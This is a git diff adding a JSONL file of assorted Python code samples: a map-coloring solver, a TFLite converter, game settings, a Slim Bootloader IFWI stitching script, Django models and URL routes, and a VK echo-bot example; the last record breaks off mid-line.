diff --git "a/402.jsonl" "b/402.jsonl" new file mode 100644--- /dev/null +++ "b/402.jsonl" @@ -0,0 +1,629 @@ +{"seq_id":"460301343","text":"import importlib\n\nimport csvReader\nimport csv\nimport random\n\nselected_root_domain_values = list()\nstate_list = []\nfailed = False\nback_track_count = 0\nout = \"\"\n\n\ndef read_csv():\n \"\"\"\n The function reads the neighbor_state_dict from csv and sets state_domain_dict for the neighbor_state_dict read.\n :return: 2 dictionaries, one mapping state and its neighbours and the other\n mapping state and its state_domain_dict i.e valid assignable colors.\n \"\"\"\n global neighbor_state_dict, state_domain_dict\n neighbor_state_dict, state_domain_dict = csvReader.read_csv()\n global visited_node\n visited_node = set()\n global selected_dict\n selected_dict = dict()\n global selected_backtrack_node\n selected_backtrack_node = set()\n\n\ndef forward_checking_lcv(failed_index, state_domain_dict, neighbor_state_dict, is_backtrack=False, parent_domain_to_be_chosen=None):\n \"\"\"\n The function implements Forward Checking Algorithm to solve\n Map couloring problem\n :param failed_index:Start Index during backtracking process.\n :param state_domain_dict:Dictionary mapping states and their state_domain_dicts i.e List of legal colors available to be chosen.\n :param neighbor_state_dict: Dictionary mapping states and their neigbours\n :param is_backtrack: Flag to differentiate between backtracking process and the normal flow\n :param parent_domain_to_be_chosen: Parent Domain to be chosen once the algorithm reaches the root node and restarts the algorithm\n :return:\n \"\"\"\n global back_track_count\n global failed\n global out\n key = state_list[0]\n i = failed_index\n while i < len(state_list):\n\n previous_selected_parent_domain = None\n key = state_list[i]\n if len(state_domain_dict[key]) <= 0:\n back_track_count += 1\n out += key.lower() + \",\" + \"White\" + \"\\n\"\n failed = True\n failed_index = i\n break\n else:\n failed = False\n if key not in visited_node and len(state_domain_dict[key]) > 0:\n if is_backtrack and selected_dict.get(key, None) is not None:\n previous_selected_parent_domain = selected_dict.get(key).pop()\n if previous_selected_parent_domain in state_domain_dict[key]:\n state_domain_dict[key].remove(previous_selected_parent_domain)\n if len(selected_dict[key]) == 0:\n del selected_dict[key]\n if parent_domain_to_be_chosen is not None and key == state_list[0]:\n parent_domain = parent_domain_to_be_chosen\n previous_selected_parent_domain = selected_root_domain_values[-1]\n else:\n parent_domain = lcv(key, state_domain_dict, neighbor_state_dict, selected_dict)\n state_domain_dict[key].remove(parent_domain)\n selected_dict.setdefault(key, list()).append(parent_domain)\n visited_node.add(key)\n for neighbours in neighbor_state_dict[key]:\n if previous_selected_parent_domain is not None and previous_selected_parent_domain not in state_domain_dict[neighbours]:\n if neighbours in selected_dict.keys() and previous_selected_parent_domain not in selected_dict[neighbours]:\n state_domain_dict[neighbours].append(previous_selected_parent_domain)\n if parent_domain in state_domain_dict[neighbours] and neighbours not in list(visited_node):\n state_domain_dict[neighbours].remove(parent_domain)\n i += 1\n out += key.lower() + \",\" + parent_domain + \"\\n\"\n if failed:\n length = len(list(selected_backtrack_node))\n if length > 0:\n last_element = list(sorted(selected_backtrack_node))[0]\n failed_index = last_element - 1\n else:\n failed_index -= 
1\n while len(state_domain_dict[state_list[failed_index]]) <= 1:\n failed_index -= 1\n selected_backtrack_node.add(failed_index)\n if failed_index > 0:\n visited_node.clear()\n forward_checking_lcv(failed_index, state_domain_dict, neighbor_state_dict, True, None)\n else:\n state_domain_dict_list = ['Red', 'Green', 'Blue', 'Yellow']\n previous_root_values = selected_dict[state_list[0]]\n selected_root_domain_values.extend(previous_root_values)\n for previous_domain in selected_root_domain_values:\n state_domain_dict_list.remove(previous_domain)\n if len(state_domain_dict_list) == 0:\n return\n read_csv()\n forward_checking_lcv(0, state_domain_dict, neighbor_state_dict, True, state_domain_dict_list[0])\n else:\n pass\n\n\ndef lcv(key_state, state_domain, neighbour_list, selected_dict):\n \"\"\"\n :param key: The state for which color have to be selected\n :param state_domain: Dictionary mapping states and their state_domain_dicts i.e List of legal colors available to be chosen.\n :param neighbour_list: Dictionary mapping states and their neigbours\n :return:\n \"\"\"\n num_neighbour_colors = 0\n color_dict = dict()\n for color in state_domain[key_state]:\n for neighbour in neighbour_list[key_state]:\n if neighbour not in selected_dict.keys():\n if color in state_domain[neighbour]:\n if len(state_domain[neighbour]) - 1 == 0:\n color_dict[color] = float(\"inf\")\n else:\n num_neighbour_colors += len(state_domain[neighbour]) - 1\n\n if color not in color_dict.keys():\n color_dict[color] = num_neighbour_colors\n\n return min(color_dict, key=lambda k: color_dict[k])\n\n\ndef main():\n importlib.reload(csvReader)\n read_csv()\n global state_list\n state_list = ['WA', 'OR', 'CA', 'NV', 'ID', 'MT', 'WY', 'UT', 'AZ', 'NM', 'CO', 'ND', 'SD', 'NE', 'KS', 'OK', 'TX', 'MN', 'IA', 'MO', 'AR', 'LA', 'MS', 'AL', 'FL', 'GA', 'SC', 'NC', 'TN', 'KY', 'VA', 'DE', 'MD', 'WV', 'OH', 'IN', 'IL', 'WI', 'MI', 'PA', 'NJ', 'CT', 'RI', 'NY', 'VT', 'NH', 'MA', 'ME', 'AK', 'HI', 'DC']\n forward_checking_lcv(0, state_domain_dict, neighbor_state_dict)\n print(\"Backtrack Count\", back_track_count)\n return out\n","sub_path":"Map-Coloring-Problem- Intelligent Systems/MapColoringBackend-master/ForwardChecking_LCV.py","file_name":"ForwardChecking_LCV.py","file_ext":"py","file_size_in_byte":6277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"456516037","text":"# Run with TF 2.0+\nimport tensorflow as tf\nfrom tqdm import tqdm\nimport tensorflow_datasets as tfds\nimport cv2\nfrom glob import glob\nimport numpy as np\n# Convert the model.\n\ninput_height = 992\ninput_width = 1504\nh_to_w_ratio = input_height /input_width\nnum_calibration_steps = 20\n\n\ndef representative_dataset_gen():\n sample_folder = glob('{}/*.*'.format('samples'))\n data = [load_test_data(sample_file) for sample_file in tqdm(sample_folder)]\n # data = tfds.load(data)\n\n for _ in range(num_calibration_steps):\n image = data.pop()\n yield [image]\n\n\ndef load_test_data(image_path):\n img = cv2.imread(image_path).astype(np.uint8)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = crop(img)\n img = preprocessing(img)\n img = np.expand_dims(img, axis=0)\n return img\n\ncrop_image = lambda img, x0, y0, w, h: img[y0:y0+h, x0:x0+w]\n\ndef crop(img):\n h, w = img.shape[:2]\n # if (h < input_height) or (w < input_width):\n # print(\"Error, please make sure the image is at least\" + str(input_width) + \"x\" + str(input_height))\n # return;\n if (h != input_height) or (w != input_width):\n if(h > w):\n 
print(\"Error, please make sure the image is in landscape mode\")\n return;\n else:\n crop_height = int(w * h_to_w_ratio)\n height_middle_point = int(h / 2)\n cropped_image = crop_image(img, 0, height_middle_point - int(crop_height / 2), w, crop_height)\n return cropped_image.astype(np.float32)\n else:\n return img\n \n\ndef preprocessing(img):\n img = cv2.resize(img, (input_width, input_height))\n print(input_width)\n print(input_height)\n return img/127.5 - 1.0\n\n\ndef save_images(images, image_path):\n # return imsave(inverse_transform(images), size, image_path)\n return imsave(inverse_transform(images.squeeze()).astype(np.uint8), image_path)\n\ndef inverse_transform(images):\n return (images+1.) / 2 * 255\n\n\ndef imsave(images, path):\n # return misc.imsave(path, images)\n return cv2.imwrite(path, cv2.cvtColor(images, cv2.COLOR_BGR2RGB))\n\n\nmodel = tf.saved_model.load('./')\nconcrete_func = model.signatures[\n tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY]\n\n'''keep the ratio as close to 3/2 while being divisible by 32'''\nconcrete_func.inputs[0].set_shape([1, input_height, input_width, 3])\nconverter = tf.lite.TFLiteConverter.from_concrete_functions([concrete_func])\nconverter.optimizations = [tf.lite.Optimize.DEFAULT]\nconverter.representative_dataset = tf.lite.RepresentativeDataset(\n representative_dataset_gen)\ntflite_model = converter.convert()\nopen(\"./converted_model.tflite\",\"wb\").write(tflite_model)\n","sub_path":"models/TFLite/saved_model_to_tflite_int_quantized.py","file_name":"saved_model_to_tflite_int_quantized.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"125725262","text":"class Settings:\n \"\"\"A class to store all settings for Alien Invasion.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the game's settings.\"\"\"\n # Screen settings\n self.screen_width = 1200\n self.screen_height = 800\n self.bg_colour = (30, 30, 14)\n\n self.ship_limit = 3\n self.ship_speed = 1.5\n\n self.bullet_speed = 1.5\n self.bullet_width = 3\n self.bullet_height = 15\n self.bullet_colour = (60, 60, 60)\n self.bullets_allowed = 3\n\n self.alien_speed = 1\n self.fleet_drop_speed = 10\n # fleet_direction of 1 represents right; -1 represents left.\n self.fleet_direction = 1\n\n # How quickly the game speeds up\n self.speedup_scale = 1.1\n\n self.initialize_dynamic_settings()\n\n def initialize_dynamic_settings(self):\n \"\"\"Initialize settings that change throughout the game.\"\"\"\n self.ship_speed = 1.5\n self.bullet_speed = 3.0\n self.alien_speed = 1.0\n\n # fleet_direction of 1 represents right; -1 represents left.\n self.fleet_direction = 1\n\n # Scoring\n self.alien_points = 50\n\n def increase_speed(self):\n \"\"\"Increase speed settings.\"\"\"\n self.ship_speed *= self.speedup_scale\n self.bullet_speed *= self.speedup_scale\n self.alien_speed *= self.speedup_scale\n\n def _print_settings(self):\n print(f'Ship speed: {self.ship_speed} - Bullet speed: {self.bullet_speed} - Alien speed: {self.alien_speed}\\n')\n","sub_path":"alien_invasion/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"516223979","text":"'''\r\nfirst strip out the constant and coefficent, \r\nperform a simple simplication\r\nreturn as string \r\n'''\r\n\r\ndef parser(a):\r\n a_a = a.index('+')\r\n a_a_num = int(a[:a_a] )\r\n a_b_num = int(a[a_a+1:-1])\r\n \r\n return 
a_a_num, a_b_num\r\n\r\nclass Solution(object):\r\n \r\n def complexNumberMultiply(self, a, b):\r\n \"\"\"\r\n :type a: str\r\n :type b: str\r\n :rtype: str\r\n \"\"\"\r\n first_a, first_b = parser(a) \r\n second_a, second_b = parser(b) \r\n \r\n val_1 = first_a * second_a\r\n val_2 = (first_a * second_b) + (first_b * second_a) # i coefficent\r\n val_3 = first_b * second_b * -1 # i^2 coefficent \r\n return str(val_1 + val_3 )+ \"+\"+str(val_2) + \"i\"","sub_path":"LeetCode/ComplexNumberMultiply.py","file_name":"ComplexNumberMultiply.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"347970121","text":"## @ StitchIfwi.py\n# This is a python stitching script for Slim Bootloader TGL build\n#\n# Copyright (c) 2019 - 2022, Intel Corporation. All rights reserved.
\n# SPDX-License-Identifier: BSD-2-Clause-Patent\n#\n##\n\nimport sys\nimport os\nimport re\nimport imp\nimport struct\nimport argparse\nimport zipfile\nimport shutil\nimport glob\nimport shlex\nimport subprocess\nimport xml.etree.ElementTree as ET\nfrom xml.dom import minidom\nfrom ctypes import *\nfrom subprocess import call\nfrom StitchLoader import *\nfrom security_stitch_help import *\nsys.dont_write_bytecode = True\n\n\n# sign_bin_flag can be set to false to avoid signing process. Applicable for Btg profile 0\nsign_bin_flag = True\n\nsblopen_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../'))\nif not os.path.exists (sblopen_dir):\n sblopen_dir = os.getenv('SBL_SOURCE', '')\nif not os.path.exists (sblopen_dir):\n raise Exception(\"Please set env 'SBL_SOURCE' to SBL open source root folder\")\n\ndef gen_xml_file(stitch_dir, stitch_cfg_file, btg_profile, plt_params_list, platform, tpm):\n print (\"Generating xml file .........\")\n\n fit_tool = os.path.join (stitch_dir, 'Fit', 'fit')\n new_xml_file = os.path.join (stitch_dir, 'Temp', 'new.xml')\n updated_xml_file = os.path.join (stitch_dir, 'Temp', 'updated.xml')\n sku = stitch_cfg_file.get_platform_sku().get(platform)\n cmd = [fit_tool, '-sku', sku, '-save', new_xml_file, '-w', os.path.join (stitch_dir, 'Temp')]\n run_process (cmd)\n\n tree = ET.parse(new_xml_file)\n\n xml_change_list = stitch_cfg_file.get_xml_change_list (platform, plt_params_list)\n for each in xml_change_list:\n for xml_path, value in each:\n node = tree.find('%s' % xml_path)\n node.set('value', value)\n print (value)\n\n tree.write(updated_xml_file)\n\ndef replace_component (ifwi_src_path, flash_path, file_path, comp_alg, pri_key):\n print (\"Replacing components.......\")\n work_dir = os.getcwd()\n ifwi_bin = bytearray (get_file_data (ifwi_src_path))\n ifwi = IFWI_PARSER.parse_ifwi_binary (ifwi_bin)\n\n # assume a flash map path first\n comp_name = ''\n replace_comps = IFWI_PARSER.locate_components (ifwi, flash_path)\n if len(replace_comps) == 0:\n # assume a container path if not in flash map\n nodes = flash_path.split('/')\n comp_name = nodes[-1]\n flash_path = '/'.join(nodes[:-1])\n replace_comps = IFWI_PARSER.locate_components (ifwi, flash_path)\n\n if len(replace_comps) == 0:\n raise Exception (\"Could not locate component '%s' !\" % flash_path)\n\n if len(replace_comps) > 1:\n raise Exception (\"Multiple components were located for '%s' !\" % flash_path)\n\n replace_comp = replace_comps[0]\n if comp_name:\n # extract container image\n container_file = os.path.join(work_dir, 'CTN_%s.bin') % comp_name\n gen_file_from_object (container_file, ifwi_bin[replace_comp.offset:replace_comp.offset + replace_comp.length])\n comp_file = os.path.join(work_dir, file_path)\n\n if os.name == 'nt':\n tool_bin_dir = os.path.join(sblopen_dir, \"BaseTools\", \"Bin\", \"Win32\")\n else:\n tool_bin_dir = os.path.join(sblopen_dir, \"BaseTools\", \"BinWrappers\", \"PosixLike\")\n gen_container = os.path.join(sblopen_dir, \"BootloaderCorePkg\" , \"Tools\", \"GenContainer.py\")\n if not os.path.isabs(pri_key):\n pri_key = os.path.join (work_dir, pri_key)\n cmd_line = [sys.executable, gen_container, 'replace', '-i', container_file, '-o', container_file, '-n', comp_name,\n '-f', comp_file, '-c', comp_alg, '-k', pri_key, '-td', tool_bin_dir]\n run_process (cmd_line, True)\n comp_bin = bytearray (get_file_data (container_file))\n else:\n # replace directly in flash map\n comp_bin = bytearray (get_file_data (file_path))\n IFWI_PARSER.replace_component (ifwi_bin, 
comp_bin, flash_path)\n gen_file_from_object (ifwi_src_path, ifwi_bin)\n\ndef replace_components (ifwi_src_path, stitch_cfg_file):\n print (\"Replacing components.......\")\n replace_list = stitch_cfg_file.get_component_replace_list ()\n for flash_path, file_path, comp_alg, pri_key in replace_list:\n replace_component (ifwi_src_path, flash_path, file_path, comp_alg, pri_key)\n\ndef stitch (stitch_dir, stitch_cfg_file, sbl_file, btg_profile, plt_params_list, platform_data, platform, tpm, full_rdundant = True):\n temp_dir = os.path.abspath(os.path.join (stitch_dir, 'Temp'))\n if os.path.exists(temp_dir):\n shutil.rmtree(temp_dir, ignore_errors=True)\n shutil.copytree (os.path.join (stitch_dir, 'Input'), temp_dir)\n\n # Get bios region image ready\n sbl_image_ext = os.path.splitext(sbl_file)\n\n if sbl_image_ext[1] != \".zip\":\n print (\"\\nCopy SBL image %s for stitch\" % sbl_file)\n shutil.copy(sbl_file, os.path.join(temp_dir, \"SlimBootloader.bin\"))\n else:\n print (\"\\nUnpack files from zip file ...\")\n zf = zipfile.ZipFile(sbl_file, 'r', zipfile.ZIP_DEFLATED)\n zf.extractall(temp_dir)\n zf.close()\n\n if platform_data:\n fd = open(os.path.join(temp_dir, \"SlimBootloader.bin\"), \"rb\")\n input_data = bytearray(fd.read())\n fd.close()\n print (\"\\n Adding platform data to Slimbootloader ...\")\n data = add_platform_data(input_data, platform_data)\n fd = open(os.path.join(temp_dir, \"SlimBootloader.bin\"), \"wb\")\n fd.write(data)\n fd.close()\n\n print(\"Replace components in both partitions....\")\n replace_components (os.path.join(temp_dir, \"SlimBootloader.bin\"), stitch_cfg_file)\n\n # Generate xml\n gen_xml_file(stitch_dir, stitch_cfg_file, btg_profile, plt_params_list, platform, tpm)\n\n if sign_bin_flag:\n update_btGuard_manifests(stitch_dir, stitch_cfg_file, btg_profile, tpm)\n else:\n shutil.copy(os.path.join(temp_dir, \"SlimBootloader.bin\"), os.path.join(temp_dir, \"BiosRegion.bin\"))\n\n print (\"Run fit tool to generate ifwi.........\")\n run_process (['./Fit/fit', '-b', '-o', 'Temp/Ifwi.bin', '-f', os.path.join (temp_dir, 'updated.xml'),\n '-s', temp_dir, '-w', temp_dir, '-d', temp_dir])\n return 0\n\ndef get_para_list (plt_para):\n para_lst = dict()\n for idx, para in enumerate(plt_para):\n items = para.split(':')\n item_cnt = len(items)\n para_lst.update( {items[0] : None if (item_cnt == 1) else items[1].strip()})\n return para_lst\n\ndef main():\n hexstr = lambda x: int(x, 16)\n ap = argparse.ArgumentParser()\n ap.add_argument('-p', dest='platform', default = '', help='specify platform sku to stitch')\n ap.add_argument('-w', dest='work_dir', default = '', help='specify stitch workspace directory, CSME tools and ingredients should be here')\n ap.add_argument('-c', dest='config_file', type=str, required=True, help='specify the platform specific stitch config file')\n ap.add_argument('-s', dest='sbl_file', type=str, default='stitch_Components.zip', help='specify slim bootloader file or generate zip file')\n ap.add_argument('-b', dest='btg_profile', default = 'vm', choices=['legacy', 'vm', 'fve', 'fvme'], help='specify Boot Guard profile type')\n ap.add_argument('-d', dest='plat_data', type=hexstr, default=None, help='Specify a platform specific data (HEX, DWORD) for customization')\n ap.add_argument('-r', dest='remove', action = \"store_true\", default = False, help = \"delete temporary files after stitch\")\n ap.add_argument('-t', dest='tpm', default = 'ptt', choices=['ptt', 'dtpm', 'none'], help='specify TPM type')\n ap.add_argument('-o', dest='option', default = '', 
help = \"Platform specific stitch option. Format: '-o option1;option2;...' For each option its format is 'parameter:data'. Try -o help for more information\")\n ap.add_argument('-op', dest='outpath', default = '', help = \"Specify path to write output IFIW and signed bin files\")\n\n args = ap.parse_args()\n\n stitch_cfg_file = imp.load_source('StitchIfwiConfig', args.config_file)\n if args.work_dir == '':\n print (\"Please specify stitch work directory\")\n print ('%s' % stitch_cfg_file.extra_usage_txt)\n return 1\n\n sku_dict = stitch_cfg_file.get_platform_sku()\n if len (sku_dict) == 1 and args.platform == '':\n for sku in sku_dict:\n args.platform = sku\n print (\"No sku is given, set to default sku value %s\" % sku)\n if args.platform == '' or args.platform not in sku_dict:\n print (\"Invalid sku (%s), Please provide valid sku:\" % args.platform)\n for sku in sku_dict :\n print (\" %s - 'For %s'\" % (sku, sku_dict[sku]))\n return 1\n\n if args.btg_profile in [\"vm\",\"fvme\"] and args.tpm == \"none\":\n print (\"ERROR: Choose appropriate Tpm type for BootGuard profile 3 and 5\")\n return 1\n\n plt_params_list = get_para_list (args.option.split(';'))\n if not stitch_cfg_file.check_parameter(plt_params_list):\n exit (1)\n\n print (\"Executing stitch.......\")\n curr_dir = os.getcwd()\n sbl_file = os.path.abspath(os.path.join (curr_dir, args.sbl_file))\n\n work_dir = os.path.abspath (args.work_dir)\n os.chdir(work_dir)\n if stitch (work_dir, stitch_cfg_file, sbl_file, args.btg_profile, plt_params_list, args.plat_data, args.platform, args.tpm):\n raise Exception ('Stitching process failed !')\n os.chdir(curr_dir)\n\n generated_ifwi_file = os.path.join(work_dir, 'Temp', 'Ifwi.bin')\n ifwi_file_name = os.path.join(args.outpath,'sbl_ifwi_%s.bin' % (args.platform))\n shutil.copy(generated_ifwi_file, ifwi_file_name)\n\n generated_signed_sbl = os.path.join(work_dir, 'Temp', 'SlimBootloader.bin')\n sbl_file_name = os.path.join(args.outpath,'SlimBootloader_%s.bin' % (args.platform))\n shutil.copy(generated_signed_sbl, sbl_file_name)\n\n print (\"\\nIFWI Stitching completed successfully !\")\n print (\"Boot Guard Profile: %s\" % args.btg_profile.upper())\n print (\"IFWI image: %s\\n\" % ifwi_file_name)\n if args.remove:\n shutil.rmtree(os.path.join(work_dir, 'Temp'), ignore_errors=True)\n return 0\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"Platform/TigerlakeBoardPkg/Script/StitchIfwi.py","file_name":"StitchIfwi.py","file_ext":"py","file_size_in_byte":10158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"549114584","text":"import os.path\nfrom django.db import models\nfrom django.core.urlresolvers import reverse\nfrom django.core.files.base import ContentFile\nfrom django.dispatch import receiver\nimport taglib\nfrom mutagen import File\n\nclass Album(models.Model):\n\tname = models.CharField(max_length=64,default=\"\")\n\t\n\tdef get_absolute_url(self):\n\t\treturn reverse('album.detail', args=[str(self.id)])\n\nclass Artist(models.Model):\n\tname = models.CharField(max_length=64,default=\"\")\n\t\nclass Track(models.Model):\n\tTYPE_MP3 = \"audio/mpeg\"\n\tTYPE_OGG = \"audio/ogg\"\n\tFILE_TYPES = (\n\t\t(TYPE_MP3,\"mp3\"),\n\t\t(TYPE_OGG,\"ogg\"),\n\t)\n\tartwork = models.ImageField(upload_to='music/tracks')\n\ttitle = models.CharField(max_length=64,default=\"\")\n\talbum = models.ForeignKey(Album, on_delete=models.CASCADE, null = True)\n\tartist = models.CharField(max_length=64,default=\"\")\n\tgenre = 
models.CharField(max_length=64,default=\"\")\n\tname = models.CharField(max_length=50,default=\"\")\n\ttype = models.CharField(max_length=20, choices=FILE_TYPES)\n\tfile = models.FileField(upload_to='music/tracks')\n\t\n\tdef get_absolute_url(self):\n\t\treturn reverse('track.detail', args=[str(self.id)])\n\t\n\t\n\tdef updateMetadataSave(self):\n\t\tself.updateMetadata()\n\t\tself.save()\n\t\n\tdef setFieldFromTags(self,tags,tag_title,field_name):\n\t\tif tags.get(tag_title) != None:\n\t\t\tfield = ''\n\t\t\tfor tag_title in tags.get(tag_title):\n\t\t\t\tfield = getattr(self, field_name)\n\t\t\t\tfield = ''\n\t\t\t\tfield += tag_title + ' '\n\t\t\tsetattr(self, field_name, field)\n\n\tdef updateMetadata(self):\n\t\tsong = taglib.File(self.file.path)\t\t\n\t\tself.setFieldFromTags(song.tags,'TITLE','title')\n\t\tif song.tags.get('ALBUM') != None:\n\t\t\tfor album_name in song.tags.get('ALBUM'):\n\t\t\t\ttry:\n\t\t\t\t\talbum = Album.objects.get(name=album_name)\n\t\t\t\t\tself.album = album\n\t\t\t\texcept Album.DoesNotExist:\n\t\t\t\t\tnew_album = Album(name=album_name)\n\t\t\t\t\tnew_album.save()\n\t\t\t\t\tself.album = new_album\n\n\t\tself.setFieldFromTags(song.tags,'ARTIST','artist')\n\t\tself.setFieldFromTags(song.tags,'GENRE','genre')\n\t\tfile = File(self.file.path)\n\t\tif file.tags != None:\n\t\t\tfor tag in file.tags:\n\t\t\t\tif tag.startswith(\"APIC\"):\n\t\t\t\t\tartwork = file.tags[tag].data\n\t\t\t\t\tself.artwork.save('art.jpg',ContentFile(artwork))\n\t\t\t\t\tbreak\n\n\t\tfileName, fileExtension = os.path.splitext(self.file.name)\n\t\tif(fileExtension == '.mp3'):\n\t\t\tself.type = self.TYPE_MP3\n\t\telif(fileExtension == '.ogg'):\n\t\t\tself.type = self.TYPE_OGG\n","sub_path":"wolf_services/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"72166452","text":"from .scholix_v1 import api_v1\n\n\nlinks_from_datasource_parser = api_v1.parser()\nlinks_from_datasource_parser.add_argument('datasource', required=True,\n help=\"Filter Scholix relationships collected from a LinkProvider\")\nlinks_from_datasource_parser.add_argument('page', required=False, help=\"select page of result\")\n\nlinks_from_pid_parser = api_v1.parser()\nlinks_from_pid_parser.add_argument(\"pid\", required=True, help=\"persistent Identifier\")\nlinks_from_pid_parser.add_argument(\"pidType\", required=False, help=\"persistent Identifier Type\")\nlinks_from_pid_parser.add_argument(\"targetPidType\", required=False,\n help=\"typology target filter should be publication, dataset or unknown\")\nlinks_from_pid_parser.add_argument(\"datasourceTarget\", required=False,\n help=\"a datasource provenace filter of the target relation\")\nlinks_from_pid_parser.add_argument(\"page\", required=False, help=\"select page of result\")\n\nlinks_from_publisher_parser = api_v1.parser()\nlinks_from_pid_parser.add_argument(\"publisher\", required=True, help=\"publisher name\")\nlinks_from_publisher_parser.add_argument(\"page\", required=False, help=\"select page of result\")","sub_path":"apis/v1/parser_arguments.py","file_name":"parser_arguments.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"603850950","text":"# module for textadvzix\n\n\n# represents the user\nclass User:\n def __init__(self, name, x=0, y=0):\n self.name = name\n self.x = x\n self.y = y\n self.coords = str(x) + \"x\" + 
str(y)\n","sub_path":"User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"384601383","text":"\"\"\"\nBasic group long polling example.\n\nCaution: don't store credentials and settings in your git. Use env variables or config file\nWe set it here to simplify the example.\n\n\n\"\"\"\nfrom avkapi import VK\nfrom avkapi import types\nfrom avkapi.dispatcher import Dispatcher\nfrom avkapi.utils.executor import start_polling\n\n# Set your VK credentials.\nVK_ACCESS_TOKEN = '2e37d9dd8f06e2ccf8dae5'\nVK_GROUP_ID = 123456\n\n\n# Create vk instance\n# You can use it for simple calling VK API methods\nvk = VK(access_token=VK_ACCESS_TOKEN)\n\n# Create dispatcher instance\n# You need to use a dispatcher for handling incoming messages from your users\ndp = Dispatcher(vk)\n\n\n@dp.message_handler(content_types=types.MessageType.MESSAGE_NEW)\nasync def echo_handler(message: types.Message):\n \"\"\" Handler catches all incoming messages and sends back the same. \"\"\"\n # calling message.send method\n await vk.messages.send(message=message.text, peer_id=message.peer_id)\n\n\nasync def shutdown(_: Dispatcher):\n \"\"\" Graceful application shutdown. \"\"\"\n await vk.close()\n\n\nif __name__ == '__main__':\n start_polling(dp, group_id=VK_GROUP_ID, on_shutdown=shutdown)\n\n","sub_path":"examples/echo_bot_polling.py","file_name":"echo_bot_polling.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"213411493","text":"from django.conf.urls import include\nfrom django.contrib import admin\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom django.urls import path\nfrom django.views.generic.base import RedirectView\nfrom drf_spectacular.views import (\n SpectacularAPIView,\n SpectacularRedocView,\n SpectacularSwaggerView,\n)\n\nfrom auth.views.authtoken import authtoken\nfrom rr.routers import router\nfrom rr.views.attribute import attribute_admin_list, attribute_list, attribute_view\nfrom rr.views.certificate import (\n certificate_admin_list,\n certificate_info,\n certificate_list,\n)\nfrom rr.views.contact import contact_list\nfrom rr.views.email import email_list\nfrom rr.views.endpoint import endpoint_list\nfrom rr.views.login import ShibbolethLoginView, logout_redirect\nfrom rr.views.metadata import metadata, metadata_import, metadata_management\nfrom rr.views.redirecturi import redirecturi_list\nfrom rr.views.serviceprovider import (\n BasicInformationUpdate,\n BasicInformationView,\n LdapServiceProviderCreate,\n LdapTechnicalInformationUpdate,\n OidcServiceProviderCreate,\n OidcTechnicalInformationUpdate,\n SAMLAdminList,\n SamlServiceProviderCreate,\n SamlTechnicalInformationUpdate,\n ServiceProviderDelete,\n ServiceProviderList,\n)\nfrom rr.views.sp_errors import sp_error\nfrom rr.views.spadmin import activate_key, admin_list\nfrom rr.views.statistics import statistics_list, statistics_summary_list\nfrom rr.views.testuser import testuser_attribute_data, testuser_list\nfrom rr.views.usergroup import usergroup_list\n\n# Overwrite default status handlers\nhandler400 = \"rr.views.handlers.bad_request\"\nhandler403 = \"rr.views.handlers.permission_denied\"\nhandler404 = \"rr.views.handlers.page_not_found\"\nhandler500 = \"rr.views.handlers.server_error\"\n\nurlpatterns = [\n path(\"api/v1/\", include(router.urls)),\n 
path(\"api/schema/\", SpectacularAPIView.as_view(), name=\"schema\"),\n path(\"api/schema/swagger/\", SpectacularSwaggerView.as_view(url_name=\"schema\"), name=\"swagger-ui\"),\n path(\"api/schema/redoc/\", SpectacularRedocView.as_view(url_name=\"schema\"), name=\"redoc\"),\n path(\"swagger/\", RedirectView.as_view(url=\"/api/schema/swagger/\")),\n path(\"admin_django/doc/\", include(\"django.contrib.admindocs.urls\")),\n path(\"admin_django/\", admin.site.urls),\n path(\"\", login_required(ServiceProviderList.as_view()), name=\"front-page\"),\n path(\"authtoken/\", authtoken, name=\"auth-token\"),\n path(\"login/\", LoginView.as_view(), name=\"login\"),\n path(\"login/shibboleth/\", ShibbolethLoginView.as_view(), name=\"shibboleth-login\"),\n path(\"logout/\", logout_redirect, name=\"logout\"),\n path(\n \"logout/local/\",\n LogoutView.as_view(template_name=\"registration/logout.html\", redirect_field_name=\"return\"),\n name=\"logout-local\",\n ),\n path(\"list/\", login_required(ServiceProviderList.as_view()), name=\"serviceprovider-list\"),\n path(\"admin//\", admin_list, name=\"admin-list\"),\n path(\"attribute//\", attribute_list, name=\"attribute-list\"),\n path(\"attribute/list/\", attribute_admin_list, name=\"attribute-admin-list\"),\n path(\"attribute/view//\", attribute_view, name=\"attribute-view\"),\n path(\"certificate//\", certificate_list, name=\"certificate-list\"),\n path(\"certificate/info//\", certificate_info, name=\"certificate-info\"),\n path(\"certificate/list/\", certificate_admin_list, name=\"certificate-admin-list\"),\n path(\"contact//\", contact_list, name=\"contact-list\"),\n path(\"endpoint//\", endpoint_list, name=\"endpoint-list\"),\n path(\"email/\", email_list, name=\"email-list\"),\n path(\"metadata/import/\", metadata_import, name=\"metadata-import\"),\n path(\"metadata/manage/saml/\", metadata_management, {\"service_type\": \"saml\"}, name=\"metadata-manage-saml\"),\n path(\"metadata/manage/ldap/\", metadata_management, {\"service_type\": \"ldap\"}, 